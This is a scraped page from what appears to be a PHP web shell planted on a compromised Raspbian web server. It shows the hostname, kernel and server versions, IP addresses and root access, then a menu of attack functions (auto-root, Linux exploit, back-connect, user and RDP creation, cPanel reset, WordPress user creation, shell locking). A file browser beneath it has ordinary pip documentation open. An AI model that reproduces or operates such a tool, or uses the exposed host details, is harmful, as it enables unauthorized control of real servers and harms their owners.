Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.228
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
python-pip /
html /
reference /
[ HOME SHELL ]
Name
Size
Permission
Action
index.rst
238
B
-rw-r--r--
pip.rst.gz
3.23
KB
-rw-r--r--
pip_check.rst
598
B
-rw-r--r--
pip_config.rst
215
B
-rw-r--r--
pip_download.rst
3.4
KB
-rw-r--r--
pip_freeze.rst
602
B
-rw-r--r--
pip_hash.rst
1.18
KB
-rw-r--r--
pip_install.rst.gz
11.23
KB
-rw-r--r--
pip_list.rst
1.64
KB
-rw-r--r--
pip_search.rst
443
B
-rw-r--r--
pip_show.rst
2.08
KB
-rw-r--r--
pip_uninstall.rst
543
B
-rw-r--r--
pip_wheel.rst
1.49
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pip_hash.rst
.. _`pip hash`: pip hash ------------ .. contents:: Usage ***** .. pip-command-usage:: hash Description *********** .. pip-command-description:: hash Overview ++++++++ ``pip hash`` is a convenient way to get a hash digest for use with :ref:`hash-checking mode`, especially for packages with multiple archives. The error message from ``pip install --require-hashes ...`` will give you one hash, but, if there are multiple archives (like source and binary ones), you will need to manually download and compute a hash for the others. Otherwise, a spurious hash mismatch could occur when :ref:`pip install` is passed a different set of options, like :ref:`--no-binary <install_--no-binary>`. Options ******* .. pip-command-options:: hash Example ******** Compute the hash of a downloaded archive:: $ pip download SomePackage Collecting SomePackage Downloading SomePackage-2.2.tar.gz Saved ./pip_downloads/SomePackage-2.2.tar.gz Successfully downloaded SomePackage $ pip hash ./pip_downloads/SomePackage-2.2.tar.gz ./pip_downloads/SomePackage-2.2.tar.gz: --hash=sha256:93e62e05c7ad3da1a233def6731e8285156701e3419a5fe279017c429ec67ce0
Close